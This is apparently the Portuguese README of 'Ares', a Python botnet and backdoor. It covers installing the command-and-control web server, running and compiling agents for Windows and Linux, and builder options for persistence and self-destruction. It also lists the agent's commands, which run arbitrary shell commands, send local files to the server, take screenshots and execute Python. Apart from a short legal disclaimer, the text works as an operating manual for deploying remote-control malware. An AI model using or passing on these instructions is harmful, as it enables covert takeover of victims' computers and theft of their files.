
Botnet e backdoor em Python
Ares é uma ferramenta de acesso remoto em Python.
Aviso: Use este software apenas de acordo com a legislação vigente no seu país. O uso indevido deste software pode levantar questões legais e éticas pelas quais não me responsabilizo e nem apoio.
Ares é composto por dois programas principais:
A interface web pode ser executada em qualquer servidor com Python. O agente pode ser compilado para executáveis nativos usando pyinstaller.
Instale as dependências Python:
pip install -r requirements.txt
Inicialize o banco de dados:
cd server
./ares.py initdb
Para compilar agentes Windows no Linux, configure o wine (opcional):
./wine_setup.sh
Execute com o servidor integrado (depuração):
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Ou execute usando gunicorn:
gunicorn ares:app -b 0.0.0.0:8080 --threads 20
O servidor agora deve estar acessível em http://localhost:8080
Execute o agente Python (atualize o config.py conforme necessário):
cd agent
./agent.py
Compile um novo agente para um binário independente:
./builder.py -p Linux --server http://localhost:8080 -o agent
./agent
Para ver a lista de opções suportadas, execute ./builder.py -h
./agent/builder.py -h
usage: builder.py [-h] -p PLATFORM --server SERVER -o OUTPUT
[--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
[--max_failed_connections MAX_FAILED_CONNECTIONS]
[--persistent]
Constrói um agente Ares.
argumentos opcionais:
-h, --help mostra esta mensagem de ajuda e sai
-p PLATFORM, --platform PLATFORM
Plataforma alvo (Windows, Linux).
--server SERVER Endereço do servidor C&C (ex: http://localhost:8080).
-o OUTPUT, --output OUTPUT
Nome do arquivo de saída.
--hello-interval HELLO_INTERVAL
Intervalo (em segundos) entre cada requisição ao C&C.
--idle_time IDLE_TIME
Tempo de inatividade (em segundos) após o qual entrar em modo ocioso.
No modo ocioso, o agente busca comandos com menos frequência
(a cada <hello_interval> segundos).
--max_failed_connections MAX_FAILED_CONNECTIONS
O agente se autodestruirá se não conseguir contato com o
C&C por <max_failed_connections> vezes seguidas.
--persistent Instala automaticamente o agente na primeira execução.
<any shell command>
Executa o comando em um shell e retorna sua saída.
upload <local_file>
Envia <local_file> para o servidor.
download <url> <destination>
Baixa um arquivo via HTTP(S).
zip <archive_name> <folder>
Cria um arquivo zip da pasta.
screenshot
Tira uma captura de tela.
python <command|file>
Executa um comando Python ou arquivo local.
persist
Instala o agente.
clean
Desinstala o agente.
exit
Mata o agente.
help
Esta ajuda.